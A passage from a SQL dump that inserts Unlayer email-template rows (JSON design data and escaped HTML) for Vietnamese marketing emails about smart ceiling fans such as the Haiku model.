\":600,\\\"height\\\":600},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"Image\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_9\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_36\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_25\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"OIZxZQ05r6\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"-RLsY6UJmh\\\",\\\"contents\\\":[{\\\"id\\\":\\\"_KgIg1jzP-\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#BBBBBB\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_5\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"dGNFP6u5tP\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"circle-black\\\",\\\"icons\\\":[{\\\"url\\\":\\\"https:\\/\\/facebook.com\\/\\\",\\\"name\\\":\\\"Facebook\\\"},{\\\"url\\\":\\\"https:\\/\\/pinterest.com\\/\\\",\\\"name\\\":\\\"Pinterest\\\"},{\\\"url\\\":\\\"https:\\/\\/linkedin.com\\/\\\",\\\"name\\\":\\\"LinkedIn\\\"},{\\\"url\\\":\\\"https:\\/\\/twitter.com\\/\\\",\\\"name\\\":\\\"Twitter\\\"}],\\\"editor\\\":{\\\"data\\\":{\\\"showDefaultIcons\\\":true,\\\"showDefaultOptions\\\":true,\\\"customIcons\\\":[],\\\"customOptions\\\":[]}}},\\\"align\\\":\\\"center\\\",\\\"spacing\\\":5,\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_social_1\\\",\\\"htmlClassNames\\\":\\\"u_content_social\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"INMPXUgyFl\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 15px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#f5f5f5\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"160%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_35\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 160%;\\\\\\\">Xu h\\u01b0\\u1edbng l\\u00e0m m\\u00e1t ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n v\\u00e0 ph\\u00f9 h\\u1ee3p v\\u1edbi ki\\u1ebfn tr\\u00fac kh\\u00f4ng gian n\\u1ed9i th\\u1ea5t nh\\u00e0 \\u1edf Vi\\u1ec7t Nam. S\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n s\\u1ebd gi\\u00fap b\\u1ea1n ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n chi phi ti\\u1ec1n \\u0111i\\u1ec7n h\\u00e0ng th\\u00e1ng. V\\u00e0o m\\u00f9a h\\u00e8 qu\\u1ea1t tr\\u1ea7n k\\u1ebft h\\u1ee3p v\\u1edbi \\u0111i\\u1ec1u ho\\u00e0 kh\\u00f4ng kh\\u00ed b\\u1ea1n s\\u1ebd t\\u0103ng th\\u00eam 2-5 \\u0111\\u1ed9 C, m\\u1ed7i \\u0111\\u1ed9 C b\\u1ea1n t\\u0103ng t\\u1eeb h\\u1ec7 th\\u1ed1ng \\u0111i\\u1ec1u ho\\u00e0 s\\u1ebd ti\\u1ebft ki\\u1ec7m 5% chi ph\\u00ed \\u0111i\\u1ec7n h\\u00e0ng th\\u00e1ng.<\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"cHUf919bht\\\",\\\"type\\\":\\\"text_deprecated\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 22px 20px\\\",\\\"anchor\\\":\\\"\\\",\\\"color\\\":\\\"#ced4d9\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"170%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_36\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 170%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 20.4px;\\\\\\\">\\u00a9 Tổ chức đào tạo WIT Technology | All Rights Reserve.\\u00a0<\\/span><\\/p>\\\\n<p style=\\\\\\\"font-size: 14px; line-height: 170%;\\\\\\\"><span style=\\\\\\\"font-size: 12px; line-height: 20.4px;\\\\\\\"><a rel=\\\\\\\"noopener\\\\\\\" href=\\\\\\\"https:\\/\\/hogiaphat.vn\\/lien-he\\\\\\\" target=\\\\\\\"_blank\\\\\\\" data-u-link-value=\\\\\\\"eyJuYW1lIjoid2ViIiwiYXR0cnMiOnsiaHJlZiI6Int7aHJlZn19IiwidGFyZ2V0Ijoie3t0YXJnZXR9fSJ9LCJ2YWx1ZXMiOnsiaHJlZiI6Imh0dHBzOi8vaG9naWFwaGF0LnZuL2xpZW4taGUiLCJ0YXJnZXQiOiJfYmxhbmsifX0=\\\\\\\"><span style=\\\\\\\"text-decoration: underline; line-height: 20.4px; font-size: 12px;\\\\\\\">Unsubscribe<\\/span><\\/a>\\u00a0 here<\\/span><\\/p>\\\",\\\"_override\\\":{\\\"mobile\\\":{\\\"textAlign\\\":\\\"center\\\"}},\\\"hideMobile\\\":false}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_23\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"#000000\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_17\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}}],\\\"values\\\":{\\\"popupPosition\\\":\\\"center\\\",\\\"popupWidth\\\":\\\"600px\\\",\\\"popupHeight\\\":\\\"auto\\\",\\\"borderRadius\\\":\\\"10px\\\",\\\"contentAlign\\\":\\\"center\\\",\\\"contentVerticalAlign\\\":\\\"center\\\",\\\"contentWidth\\\":\\\"600px\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Rubik\\\",\\\"value\\\":\\\"\'Rubik\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Rubik:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"textColor\\\":\\\"#000000\\\",\\\"popupBackgroundColor\\\":\\\"#FFFFFF\\\",\\\"popupBackgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"cover\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"popupOverlay_backgroundColor\\\":\\\"rgba(0, 0, 0, 0.1)\\\",\\\"popupCloseButton_position\\\":\\\"top-right\\\",\\\"popupCloseButton_backgroundColor\\\":\\\"#DDDDDD\\\",\\\"popupCloseButton_iconColor\\\":\\\"#000000\\\",\\\"popupCloseButton_borderRadius\\\":\\\"0px\\\",\\\"popupCloseButton_margin\\\":\\\"0px\\\",\\\"popupCloseButton_action\\\":{\\\"name\\\":\\\"close_popup\\\",\\\"attrs\\\":{\\\"onClick\\\":\\\"document.querySelector(\'.u-popup-container\').style.display = \'none\';\\\"}},\\\"backgroundColor\\\":\\\"#f5f5f5\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"preheaderText\\\":\\\"\\\",\\\"linkStyle\\\":{\\\"body\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_body\\\",\\\"htmlClassNames\\\":\\\"u_body\\\"}}},\\\"schemaVersion\\\":12}\"', '', 1, '2023-03-14 10:01:39');
INSERT INTO `tblma_email_templates` (`id`, `name`, `color`, `category`, `published`, `language`, `data_html`, `data_design`, `description`, `addedfrom`, `dateadded`) VALUES
(15, 'Haiku_2023', '', 4, 1, 'vietnamese', '\"<!DOCTYPE HTML PUBLIC \\\"-\\/\\/W3C\\/\\/DTD XHTML 1.0 Transitional \\/\\/EN\\\" \\\"http:\\/\\/www.w3.org\\/TR\\/xhtml1\\/DTD\\/xhtml1-transitional.dtd\\\">\\r\\n<html xmlns=\\\"http:\\/\\/www.w3.org\\/1999\\/xhtml\\\" xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:o=\\\"urn:schemas-microsoft-com:office:office\\\">\\r\\n<head>\\r\\n<!--[if gte mso 9]>\\r\\n<xml>\\r\\n  <o:OfficeDocumentSettings>\\r\\n    <o:AllowPNG\\/>\\r\\n    <o:PixelsPerInch>96<\\/o:PixelsPerInch>\\r\\n  <\\/o:OfficeDocumentSettings>\\r\\n<\\/xml>\\r\\n<![endif]-->\\r\\n  <meta http-equiv=\\\"Content-Type\\\" content=\\\"text\\/html; charset=UTF-8\\\">\\r\\n  <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\">\\r\\n  <meta name=\\\"x-apple-disable-message-reformatting\\\">\\r\\n  <!--[if !mso]><!--><meta http-equiv=\\\"X-UA-Compatible\\\" content=\\\"IE=edge\\\"><!--<![endif]-->\\r\\n  <title><\\/title>\\r\\n  \\r\\n    <style type=\\\"text\\/css\\\">\\r\\n      @media only screen and (min-width: 620px) {\\r\\n  .u-row {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    vertical-align: top;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-50 {\\r\\n    width: 300px !important;\\r\\n  }\\r\\n\\r\\n  .u-row .u-col-100 {\\r\\n    width: 600px !important;\\r\\n  }\\r\\n\\r\\n}\\r\\n\\r\\n@media (max-width: 620px) {\\r\\n  .u-row-container {\\r\\n    max-width: 100% !important;\\r\\n    padding-left: 0px !important;\\r\\n    padding-right: 0px !important;\\r\\n  }\\r\\n  .u-row .u-col {\\r\\n    min-width: 320px !important;\\r\\n    max-width: 100% !important;\\r\\n    display: block !important;\\r\\n  }\\r\\n  .u-row {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col {\\r\\n    width: 100% !important;\\r\\n  }\\r\\n  .u-col > div {\\r\\n    margin: 0 auto;\\r\\n  }\\r\\n}\\r\\nbody {\\r\\n  margin: 0;\\r\\n  padding: 0;\\r\\n}\\r\\n\\r\\ntable,\\r\\ntr,\\r\\ntd {\\r\\n  vertical-align: top;\\r\\n  border-collapse: collapse;\\r\\n}\\r\\n\\r\\np {\\r\\n  margin: 0;\\r\\n}\\r\\n\\r\\n.ie-container table,\\r\\n.mso-container table {\\r\\n  table-layout: fixed;\\r\\n}\\r\\n\\r\\n* {\\r\\n  line-height: inherit;\\r\\n}\\r\\n\\r\\na[x-apple-data-detectors=\'true\'] {\\r\\n  color: inherit !important;\\r\\n  text-decoration: none !important;\\r\\n}\\r\\n\\r\\ntable, td { color: #000000; } #u_body a { color: #0000ee; text-decoration: underline; } @media (max-width: 480px) { #u_content_text_2 .v-text-align { text-align: center !important; } }\\r\\n    <\\/style>\\r\\n  \\r\\n  \\r\\n\\r\\n<!--[if !mso]><!--><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Lato:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><link href=\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Montserrat:400,700\\\" rel=\\\"stylesheet\\\" type=\\\"text\\/css\\\"><!--<![endif]-->\\r\\n\\r\\n<\\/head>\\r\\n\\r\\n<body class=\\\"clean-body u_body\\\" style=\\\"margin: 0;padding: 0;-webkit-text-size-adjust: 100%;background-color: #fdf4ef;color: #000000\\\">\\r\\n  <!--[if IE]><div class=\\\"ie-container\\\"><![endif]-->\\r\\n  <!--[if mso]><div class=\\\"mso-container\\\"><![endif]-->\\r\\n  <table id=\\\"u_body\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;min-width: 320px;Margin: 0 auto;background-color: #fdf4ef;width:100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\">\\r\\n  <tbody>\\r\\n  <tr style=\\\"vertical-align: top\\\">\\r\\n    <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top\\\">\\r\\n    <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td align=\\\"center\\\" style=\\\"background-color: #fdf4ef;\\\"><![endif]-->\\r\\n    \\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #bfd8d2\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #bfd8d2;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #bfd8d2;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #bfd8d2;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:30px 10px 15px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n<table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\">\\r\\n  <tr>\\r\\n    <td class=\\\"v-text-align\\\" style=\\\"padding-right: 0px;padding-left: 0px;\\\" align=\\\"center\\\">\\r\\n      <a href=\\\"https:\\/\\/hogiaphat.vn\\/\\\" target=\\\"_blank\\\">\\r\\n      <img align=\\\"center\\\" border=\\\"0\\\" src=\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677121551729-logo-baf.gif\\\" alt=\\\"Image\\\" title=\\\"Image\\\" style=\\\"outline: none;text-decoration: none;-ms-interpolation-mode: bicubic;clear: both;display: inline-block !important;border: none;height: auto;float: none;width: 28%;max-width: 162.4px;\\\" width=\\\"162.4\\\"\\/>\\r\\n      <\\/a>\\r\\n    <\\/td>\\r\\n  <\\/tr>\\r\\n<\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-image: url(\'https:\\/\\/assets.unlayer.com\\/stock-templates1677121836979-01-h.jpg\');background-repeat: no-repeat;background-position: center top;background-color: #bfd8d2\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: transparent;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-image: url(\'https:\\/\\/assets.unlayer.com\\/stock-templates1677121836979-01-h.jpg\');background-repeat: no-repeat;background-position: center top;background-color: #bfd8d2;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: transparent;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:80px 10px 15px 30px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <div class=\\\"v-text-align\\\" style=\\\"font-family: inherit; font-weight: 400; color: #035b92; line-height: 140%; text-align: left; word-wrap: break-word;\\\">\\r\\n    <p style=\\\"line-height: 140%;\\\"><span style=\\\"font-family: \'Source Sans Pro\', sans-serif; line-height: 19.6px;\\\"><span style=\\\"font-size: 44px; line-height: 61.6px;\\\"><strong>HAIKU<\\/strong><\\/span><\\/span><\\/p>\\r\\n<p style=\\\"line-height: 140%;\\\"><span style=\\\"font-size: 20px; line-height: 28px; font-family: \'Source Sans Pro\', sans-serif;\\\"><span style=\\\"line-height: 28px;\\\"><span style=\\\"line-height: 28px;\\\"><strong>The Smart Ceiling Fan of the Future - Big Ass Fans<\\/strong><\\/span><\\/span><\\/span><\\/p>\\r\\n  <\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px 30px 80px 10px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <!--[if mso]><style>.v-button {background: transparent !important;}<\\/style><![endif]-->\\r\\n<div class=\\\"v-text-align\\\" align=\\\"center\\\">\\r\\n  <!--[if mso]><v:roundrect xmlns:v=\\\"urn:schemas-microsoft-com:vml\\\" xmlns:w=\\\"urn:schemas-microsoft-com:office:word\\\" href=\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-cao-cap-haiku-h\\\" style=\\\"height:37px; v-text-anchor:middle; width:116px;\\\" arcsize=\\\"0%\\\"  stroke=\\\"f\\\" fillcolor=\\\"#ffffff\\\"><w:anchorlock\\/><center style=\\\"color:#c97a14;font-family:\'Montserrat\',sans-serif;\\\"><![endif]-->  \\r\\n    <a href=\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-cao-cap-haiku-h\\\" target=\\\"_blank\\\" class=\\\"v-button\\\" style=\\\"box-sizing: border-box;display: inline-block;font-family:\'Montserrat\',sans-serif;text-decoration: none;-webkit-text-size-adjust: none;text-align: center;color: #c97a14; background-color: #ffffff; border-radius: 0px;-webkit-border-radius: 0px; -moz-border-radius: 0px; width:auto; max-width:100%; overflow-wrap: break-word; word-break: break-word; word-wrap:break-word; mso-border-alt: none;font-size: 14px;\\\">\\r\\n      <span style=\\\"display:block;padding:10px 20px;line-height:120%;\\\"><strong><span style=\\\"line-height: 16.8px;\\\">Xem th\\u00eam<br \\/><\\/span><\\/strong><\\/span>\\r\\n    <\\/a>\\r\\n  <!--[if mso]><\\/center><\\/v:roundrect><![endif]-->\\r\\n<\\/div>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n\\r\\n\\r\\n\\r\\n<div class=\\\"u-row-container\\\" style=\\\"padding: 0px;background-color: #bfd8d2\\\">\\r\\n  <div class=\\\"u-row\\\" style=\\\"Margin: 0 auto;min-width: 320px;max-width: 600px;overflow-wrap: break-word;word-wrap: break-word;word-break: break-word;background-color: #f9f9f9;\\\">\\r\\n    <div style=\\\"border-collapse: collapse;display: table;width: 100%;height: 100%;background-color: transparent;\\\">\\r\\n      <!--[if (mso)|(IE)]><table width=\\\"100%\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\"><tr><td style=\\\"padding: 0px;background-color: #bfd8d2;\\\" align=\\\"center\\\"><table cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" border=\\\"0\\\" style=\\\"width:600px;\\\"><tr style=\\\"background-color: #f9f9f9;\\\"><![endif]-->\\r\\n      \\r\\n<!--[if (mso)|(IE)]><td align=\\\"center\\\" width=\\\"600\\\" style=\\\"width: 600px;padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\" valign=\\\"top\\\"><![endif]-->\\r\\n<div class=\\\"u-col u-col-100\\\" style=\\\"max-width: 320px;min-width: 600px;display: table-cell;vertical-align: top;\\\">\\r\\n  <div style=\\\"height: 100%;width: 100% !important;\\\">\\r\\n  <!--[if (!mso)&(!IE)]><!--><div style=\\\"box-sizing: border-box; height: 100%; padding: 0px;border-top: 0px solid transparent;border-left: 0px solid transparent;border-right: 0px solid transparent;border-bottom: 0px solid transparent;\\\"><!--<![endif]-->\\r\\n  \\r\\n<table style=\\\"font-family:\'Montserrat\',sans-serif;\\\" role=\\\"presentation\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" border=\\\"0\\\">\\r\\n  <tbody>\\r\\n    <tr>\\r\\n      <td style=\\\"overflow-wrap:break-word;word-break:break-word;padding:20px;font-family:\'Montserrat\',sans-serif;\\\" align=\\\"left\\\">\\r\\n        \\r\\n  <table height=\\\"0px\\\" align=\\\"center\\\" border=\\\"0\\\" cellpadding=\\\"0\\\" cellspacing=\\\"0\\\" width=\\\"100%\\\" style=\\\"border-collapse: collapse;table-layout: fixed;border-spacing: 0;mso-table-lspace: 0pt;mso-table-rspace: 0pt;vertical-align: top;border-top: 0px solid #BBBBBB;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n    <tbody>\\r\\n      <tr style=\\\"vertical-align: top\\\">\\r\\n        <td style=\\\"word-break: break-word;border-collapse: collapse !important;vertical-align: top;font-size: 0px;line-height: 0px;mso-line-height-rule: exactly;-ms-text-size-adjust: 100%;-webkit-text-size-adjust: 100%\\\">\\r\\n          <span>&#160;<\\/span>\\r\\n        <\\/td>\\r\\n      <\\/tr>\\r\\n    <\\/tbody>\\r\\n  <\\/table>\\r\\n\\r\\n      <\\/td>\\r\\n    <\\/tr>\\r\\n  <\\/tbody>\\r\\n<\\/table>\\r\\n\\r\\n  <!--[if (!mso)&(!IE)]><!--><\\/div><!--<![endif]-->\\r\\n  <\\/div>\\r\\n<\\/div>\\r\\n<!--[if (mso)|(IE)]><\\/td><![endif]-->\\r\\n      <!--[if (mso)|(IE)]><\\/tr><\\/table><\\/td><\\/tr><\\/table><![endif]-->\\r\\n    <\\/div>\\r\\n  